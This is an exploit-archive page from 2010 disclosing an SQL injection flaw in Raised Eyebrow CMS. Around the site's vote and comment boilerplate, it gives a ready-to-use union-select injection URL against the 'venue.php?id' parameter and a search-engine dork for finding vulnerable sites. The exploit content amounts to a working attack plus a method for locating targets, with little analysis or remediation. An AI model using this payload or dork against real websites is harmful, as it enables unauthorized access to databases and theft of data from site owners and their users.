Raised Eyebrow CMS SQL Injection Vulnerability

2010.11.16

Credit: Cru3l.b0y

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: \"Site design by Raised Eyebrow Web Studio\"

In The Name Of GOD
[+] Exploit Title: Raised Eyebrow CMS SQL Injection Vulnerability
[+] Date: 2010-11-14
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.raisedeyebrow.com/services/cms-development.html
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit : 

             http://target/path/venue.php?id=-1+union+select+1,2,3,4,5

[+] Dork: "Site design by Raised Eyebrow Web Studio"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Raised Eyebrow CMS SQL Injection Vulnerability

Dork: \"Site design by Raised Eyebrow Web Studio\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.